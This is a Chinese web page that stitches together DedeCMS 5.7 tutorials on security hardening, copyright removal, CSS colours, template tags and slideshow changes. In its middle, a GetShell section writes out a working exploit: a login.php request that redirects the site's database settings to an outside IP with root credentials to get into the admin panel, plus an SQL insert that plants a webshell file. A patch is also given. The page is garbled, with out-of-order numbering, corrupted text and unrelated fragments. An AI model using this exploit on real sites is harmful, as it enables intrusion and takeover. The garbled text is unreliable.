2013年最新织梦dedecms5.7官方幻灯片修改教程
织梦CMS5.7sp1漏洞修复和安全设置

安全,是站长不可忽视的问题,这里简单介绍DEDECMS安全设置。
1、以下目录:data、templets、uploads、a设置可读写不可执行权限。其中a目录为文档HTML默认保存路径,可以在后台进行更改;
2、以下目录:include、member、plus、dede设置为可读可执行不可写入权限。其中后台管理目录(默认dede),可自行修改;
7、定期进行备份网站目录和数据库,并在后台进行文件校验、病毒扫描、系统错误修复。
================================================================================
如何修复这些漏洞呢?
在不知道方法前,尝试先把漏洞文件删除试试,因为我们主要就是发文章,其他功能用不着,删除也没关系,如果会员和专题也不用,相应文件也可以删除
3、如果不需要使用会员、专题,可以直接删除member、special目录;
4、删除install安装目录;
5、管理员帐号密码尽量设置复杂,发布文章可以新建频道管理员,并且只给予相关权限;
6、Mysql数据库链接,不使用root用户,单独建立新用户,并给予:SELECT、INSERT、UPDATE、DELETE、CREATE、DROP、INDEX、ALTER、CREAቤተ መጻሕፍቲ ባይዱE TEMPORARY TABLES权限;
dedecms注入漏洞
d:/web/dedecms_test_gbk/member/pm.php
dedecms注入漏洞
d:/web/dedecms_test_gbk/member/mtypes.php
dedecms注入漏洞
d:/web/dedecms_test_gbk/install/index.php.bak
织梦去版权方法DedeCms 5.7全站去版权去广告方法(前台)

文章转载自彭健的博客:原文地址:/index.php/archives/140--------------------------------------------------------------------------------------------------------------------去除首页顶部“织梦CMS - 轻松建站从此开始!”进入后台--模版--默认模版管理。
找到并打开头部文件head.htm,在代码中可以找到如下代码,修改中文即可。
<span id="time">织梦CMS - 轻松建站从此开始!</span>修改网站首页logo使用FTP根据路径:/templets/default/images从里面找到logo.gif图片替换成自己要的logo 即可修改首页logo图片。
鼠标放在logo上会出现提示文字“织梦CMS_V5.7演示站点”。
进入后台--系统--系统基本参数,修改网站名称。
去掉友情链接部分的版权进入后台--模块--友情链接。
分别把“DedeCMS维基手册”“织梦技术论坛”“织梦CMS官方”这三个友情链接删除。
进入后台-模版-默认模版管理。
找到index.htm文件,在最下面找到友情链接的调用代码如下:{dede:flinktype type="dedecms"}把代码的调用删除即可,效果如下:{dede:flinktype type=""}删除织梦链使用FTP根据路径:include/taglib/flinktype.lib.php打开文件,找到以下代码删除即可:$dedecms = false;$dedecms->id = 999;$dedecms->typename = '织梦链';if($type == 'dedecms') $row[] = $dedecms;删除首页所有广告进入后台--模块--广告管理。
DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞

DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞入侵步骤如下:/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd =inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POS T[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r 0t0&_POST[GLOBALS][cfg_dbname]=root把上面validate后面的字母改为当前的验证码,即可直接进入网站后台。
小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。
下面给出官方的解决办法:解决办法:找到include/common.inc.php文件,把foreach($_REQUEST as $_k=>$_v){var_dump($_k);if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ): {exit('Request var not allow!');}}换成//检查和注册外部提交的变量function CheckRequest(&$val) {if (is_array($val)) {foreach ($val as $_k=>$_v) {CheckRequest($_k);CheckRequest($val[$_k]);}} else{if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) ){exit('Request var not allow!');}}}CheckRequest($_REQUEST);网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');再用下面表单提交,shell 就在同目录下1.php。
织梦后台如何修改背景色和文字颜色

织梦如何修改背景色和文字颜色 dedecm自带模板首页字体颜色太浅,可在templets/style/layout.css和 dedecms.css和page.css文件中修改字体: 一、dedecms.css里面: 1、找到 .header .nav ul li a{ height:32px; padding:0px 13px 0px 14px; display:block; color:#FFF; font-size:14px; float:left; } 这里修改首页导航栏字体颜色; 2、找到 img{ border:none; } a{ color:#669933; text-decoration:none; } 这里修改“互动中心、图文资讯、推荐内容、本月热点及页脚带超链 接”的字体颜色; 3、找到 .header a{ color:#666666; } 这里修改热门标签的字体颜色; 4、找到 .footer .copyright{ color:#666666; line-news .onenews p{ line-height:19px; color:#000; } 这里修改首页头条简介字体颜色; 3、找到 .index .latestnews ul a{ color:#000000; } 这里修改“最近更新”字体颜色; 4、找到 .index .listbox ul a{ color:#000; } 这里修改自己添加的栏目文章标题字体的颜色; 5、找到 .index .usercenter .tbox dd#loading{ display:block; text-align:center; line-height:200px; letter-spacing:2px; color:#999999; } 这里修改首页互动中心评论字体颜色;
DedeCMSV5.7标签手册

{dede:booklist row='12' booktype='-1' orderby='lastpost' author='' keyword=''} <a href='[field:bookurl /]'>[field:bookname /]</a><br /> {/dede:booklist}
基本语法
{dede:group row='6' orderby='threads' titlelen='30'} <li> <span><img style="visibility: inherit;" title="[field:groupname/]" src="[field:icon/]" /></span > <span><a href="[field:url/]" title="[field:groupname/]" target="_blank">[field:groupname/]</a> </span> </li> {/dede:group}
基本语法
{dede:feedback} <ul> <li class='fbtitle'>[field:username function="(@me=='guest' ? '游客' : @me)"/] 对 [field:titl e/] 的评论:</li> <li class='fbmsg'> <a href="plus/feedback.php?aid=[field:aid/]" class='fbmsg'>[field:msg /]</a> </li> </ul> {/dede:feedback}
织梦模板修改123教程

1. 首页head区域标签2. 列表页head区域标签3. 内容页head区域标签1.首页head区域标签Index.htm页面Title 区域:{dede:global.cfg_webname/}关键字:{dede:global.cfg_keywords/}描述:{dede:global.cfg_description/}2.列表页head区域标签List_article.htm页面Title 区域:{dede:field.title/}_{dede:global.cfg_webname/}关键字:{dede:field name='keywords'/}描述:{dede:field name='description' function='html2text(@me)'/}1.内容页head区域标签Article_article.htm页面Title 区域:{dede:field.title/}_{dede:global.cfg_webname/}关键字:{dede:field.keywords/}描述:{dede:field.description function='html2text(@me)'/}织梦模板修改系列教程:模板安装(第二节)你如果使用的是虚拟主机的话,需要用ftp把下载的织梦模板上传到网站根目录,一般的虚拟主机网站根目录都是web文件夹。
这个织梦模板三个文件夹,全部都是不需要更改的,直接上传到网站根目录就可以了。
模板文件default。
模板编码:gbk。
上传过程中如果出现一个对话框,就选择全部覆盖。
本地安装的话需要先安装本地测试环境,织梦本地环境搭建教程:/dedecmsjiaocheng/904.html模板上传好以后,登陆网站后台。
确保网站后台的默认模板目录为default,在首页生成哪里也要是default。
最新织梦dedecms5.7模板调用标签大全

--------------------------------------------------------------------------------
最新文章调用标签: {dede:arclist row=8 titlelen=24 orderby=pubdate}<li>[field:textlink/]</li> {/dede:arclist}
列表分页调用标签: {dede:pagelist listsize='4' listitem='index pre pageno next end '/}
--------------------------------------------------------------------------------
列表评论调用标签: [field:postnum/]
--------------------------------------------------------------------------------
查阅全文调用标签: <a href="[field:arcurl/]">查阅全文...</a>
[<a href="{dede:field name='phpurl'/}/recommend.php?arcID={dede:field name=ID/}">推荐</a>]
[<a href="{dede:field name='phpurl'/}/feedback.php?arcID={dede:field name=ID/}">评论</a>]
织梦去版权方法DedeCms 5.7全站去版权去广告方法(后台)

文章转载与彭健的博客:原文地址:/index.php/archives/133------------------------------------------------------------------------------------------------------------------ 织梦去版权方法DedeCms 5.7全站去版权去广告方法(后台)去除织梦后台登陆页面广告登陆后台-模块-文件管理器。
路径/dede/templets/login.html打开文件。
找到以下代码并删除: < div class ="dede-iframe" >< iframe name ="loginad" src ="login.phpdopost=showad" frameborder ="0" id ="loginad" scrolling ="no" marginwidth ="0" marginheight ="0" width ="100%" > </ iframe >< /div>登陆后台-模块-文件管理器。
路径/dede/login.php打开文件.找到以下代码并删除:if ($dopost=='showad'){include('templets/login_ad.htm');exit;}最后还要删除对应的"/dede/templets/login_ad.htm"模板文件,这个文件是多余的,官方加的广告链部分。
去除织梦后台登陆页面版权登陆后台-模块-文件管理器。
路径/dede/templets/login.html打开文件。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
分享给大家看看
dedecms 官方模板的首页幻灯片比较小,而且是调取站内的缩略图,并且只能跳转到缩略图所在的文章页面。
一般情况下缩略图都比较小,这样导致了幻灯片图片显得模糊不清,大大降低了网站品质。
现在,我教您随心定制首页幻灯片,并达到下面的目的:
第一、幻灯片大小随心设置,第二、幻灯片的图片不从站内缩略图提取,而是自己指定,第三、幻灯片链接跳转到指定网址(比如广告页)而不是站内文章页。
第四、幻灯片上的文字调整或者去掉。
最后效果如站长街首页的幻灯片一样,当然,你可以做的更漂亮一些,我只是提供一下方法。
首先修改幻灯片大小:用记事本打开首页模板文件templets/default/index.htm,找到如下代码:
复制代码
< !-- size: 280px * 192px -->
<script language='javascript'>
linkarr = new Array();
picarr = new Array();
textarr = new Array();
var swf_width=280;
var swf_height=192;
var files = "";
var links = "";
var texts = "";
将其中的 280 190 改成自己想要的宽度和高度。
然后用记事本打开templets/style/page.css,找到如下代码:
复制代码
.index .flash news{
width:280px;
height:192px;
overflow:hidden;
float:left;
}
把
将其中的 280 190 改成自己想要的宽度和高度。
注意要和前面的一致。
这样一来,幻灯片的宽度和高度就随你自己了。
想改就改,无非就是重复一次操作而已。
下面,我们来改图片和跳转网址:
用记事本打开首页模板文件templets/default/index.htm,找到如下代码:
复制代码
{dede:arclist flag='f' row='5'}
linkarr[[field:global.autoindex/]] = "[field:arcurl/]";
picarr[[field:global.autoindex/]] = "[field:litpic/]";
textarr[[field:global.autoindex/]] = "[field:title function='html2text(@me)'/]";
{/dede:arclist}
把其中的{dede:arclist flag='f' row='5'} 和{/dede:arclist} 都去掉,把[field:arcurl/]改成你想跳转的地址,把[field:litpic/]改成你想要在幻灯片内显示的图片的地址,把[field:title
function='html2text(@me)'/]修改成你想在幻灯片上显示的文字。
把[field:global.autoindex/]全改成1,修改完成后如下:
复制代码
linkarr[1] = "";
picarr[1] = "/img/h2.jpg";
textarr[1] = "欢迎光临购巧网!”
这样就改好了,然后你发现幻灯片上只有一张图,如果要改成多张图轮番显示,就改成下面这样:
复制代码
linkarr[1] = "";
picarr[1] = "/img/h2.jpg";
textarr[1] = "欢迎光临站长街!”
linkarr[2] = "";
picarr[2] = "/img/h2.jpg";
textarr[2] = "欢迎光临站长街!”
linkarr[3] = "";
picarr[3] = "/img/h2.jpg";
textarr[3] = "欢迎光临站长街!”
把相应的网址和图片地址及文字改一下就可以了。
想加几个就复制几下。
值得注意的是,幻灯片好像不支持站外图片,因此你得把所需显示的图片上传到自己的网站空间里。
最后,为了美观修改一下幻灯片的样式:
用记事本打开首页模板文件templets/default/index.htm,找到如下代码:
[/code]
var swf_width=280;
var swf_height=192;
[/code]
在其后面加上(代码里的说明文字自己去掉):
复制代码
var configtg="0xffffff:文字颜色|2:文字位置|0x000000:文字背景颜色|30:文字背景透明度
|0xffffff:按键文字颜色|0x4f6898:按键默认颜色|0x000033:按键当前颜色|8:自动播放时间|3:图片过渡效果|1:是否显示按钮|_blank:打开新窗口";。